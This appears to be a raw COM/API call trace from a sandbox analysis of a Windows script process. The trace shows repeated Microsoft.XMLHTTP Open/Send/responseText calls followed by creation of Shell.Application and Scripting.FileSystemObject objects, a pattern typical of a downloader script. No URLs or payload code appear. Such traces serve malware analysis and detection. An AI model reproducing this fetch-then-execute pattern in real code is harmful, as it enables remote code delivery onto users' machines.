	[0443.259] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0443.259] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0443.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7488) returned 0x0
	[0443.260] ??2@YAPEAX_K@Z () returned 0x62f330
	[0443.260] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7488, pUnkSite=0x62f330) 
	[0443.260] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0443.260] XMLHTTPRequest:IUnknown:Release (This=0x49c7488) returned 0x0
	[0443.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0443.260] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0443.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0443.260] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0443.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0443.260] longjmp () 
	[0443.260] longjmp () 
	[0443.260] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0443.260] SysStringLen (param_1=0x0) returned 0x0
	[0443.261] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0443.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0443.261] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0443.261] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0443.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0443.261] ??2@YAPEAX_K@Z () returned 0x62f310
	[0443.261] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0443.261] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0443.261] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0443.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0443.261] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0443.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0443.261] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0443.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0443.261] longjmp () 
	[0443.262] longjmp () 
	[0443.262] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0443.262] SysStringLen (param_1=0x0) returned 0x0
	[0443.262] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0443.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0443.262] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0443.262] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0443.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0443.262] ??2@YAPEAX_K@Z () returned 0x62f330
	[0443.262] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0443.262] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0443.262] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0443.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0443.262] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0443.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0443.262] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0443.263] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0443.263] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0443.263] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0443.263] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0444.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0444.278] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0444.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0444.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0444.278] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0444.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0444.279] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0444.279] SysStringLen (param_1=0x0) returned 0x0
	[0444.279] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0444.279] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0444.279] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0444.279] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0444.279] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0444.279] ??2@YAPEAX_K@Z () returned 0x62f350
	[0444.279] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0444.279] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0444.279] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0444.279] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0444.279] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0444.280] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0444.280] SysStringLen (param_1=0x0) returned 0x0
	[0444.280] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0444.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0444.282] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0444.282] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0444.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0444.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0444.283] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0445.015] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0445.016] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0445.016] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0445.017] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0445.017] SysStringLen (param_1=0x0) returned 0x0
	[0445.017] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0445.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0445.017] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0445.017] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0445.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0445.018] ??2@YAPEAX_K@Z () returned 0x62f330
	[0445.018] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0445.018] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0445.018] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0445.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0445.018] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0445.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0445.018] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0445.020] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0445.021] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0445.021] SysStringLen (param_1=0x0) returned 0x0
	[0445.021] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0445.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
